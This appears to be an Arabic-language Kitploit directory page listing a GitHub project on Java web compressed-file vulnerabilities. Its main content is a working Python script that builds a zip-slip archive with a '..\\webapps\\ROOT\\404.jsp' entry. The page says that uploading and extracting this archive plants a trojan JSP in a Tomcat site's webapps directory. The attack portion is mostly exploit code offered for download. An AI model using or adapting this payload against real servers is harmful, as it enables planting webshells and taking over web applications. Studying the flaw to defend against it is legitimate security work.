Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Java-Compressed-file-security — ثغرة أمنية في الملفات المضغوطة بـ Java Web | Kitploit
أدوات/GitHubGitHub/jas502n/java-compressed-file-security
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubjas502n/java-compressed-file-security

Java-Compressed-file-security

ثغرة أمنية في الملفات المضغوطة بـ Java Web

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
206منذ 6 سنواتتمت المراجعة من قبل Kitploit
مشاركة

Java-Compressed-file-security java web ثغرات أمان الملفات المضغوطة

بيئة الاختبار:

root@kitploit:~
Windows For Apache Tomcat/8.5.16

0x01 إنشاء ملف مضغوط خبيث لاجتياز الدليل (Directory Traversal)

الكود:

root@kitploit:~
#coding=utf-8

import zipfile  
import sys

if __name__ == "__main__":  
    try:
        with open("404.jsp", "r") as f:
            binary = f.read()
            zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
            zipFile.close()
    except IOError as e:
        raise e

0x02 رفع الملف، انقر لفك الضغط، فيتم فك ضغط ملف حصان طروادة إلى دليل webapps الخاص بالموقع

تنزيل الأداة